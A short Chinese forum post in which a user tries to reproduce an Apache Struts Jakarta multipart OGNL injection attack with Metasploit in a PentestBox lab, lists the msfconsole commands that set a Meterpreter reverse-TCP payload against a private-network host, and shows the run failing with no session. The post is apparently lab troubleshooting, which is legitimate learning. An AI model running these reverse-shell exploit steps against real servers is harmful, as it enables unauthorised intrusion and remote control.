Apache Struts Jakarta Multipart Parser OGNL Injection(Metasploit)复现失败

北城余情 提交于 2019-11-26 09:23:56

0x01:环境
PentestBox2.2
下载Exploit
https://www.exploit-db.com/exploits/31433/
加载到metasploit-framework.bak\modules\exploits\multi\http\struts

0x02:

msf exploit(41614) > use exploit/multi/http/struts/41614
msf exploit(41614) > set payload windows/meterpreter/reverse_tcp
msf exploit(41614) > show options
msf exploit(41614) > set rhost 10.160.11.192
msf exploit(41614) > set targeturi /struts2-5-showcase/
msf exploit(41614) > set lhost 10.160.14.122
msf exploit(41614) > show options
msf exploit(41614) > run
[*] Started reverse TCP handler on 10.160.14.122:4444
[-] Exploit failed: Errno::ECONNRESET An existing connection was forcibly closed by the remote host.
[*] Exploit completed, but no session was created.
msf exploit(41614) >

执行失败?

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!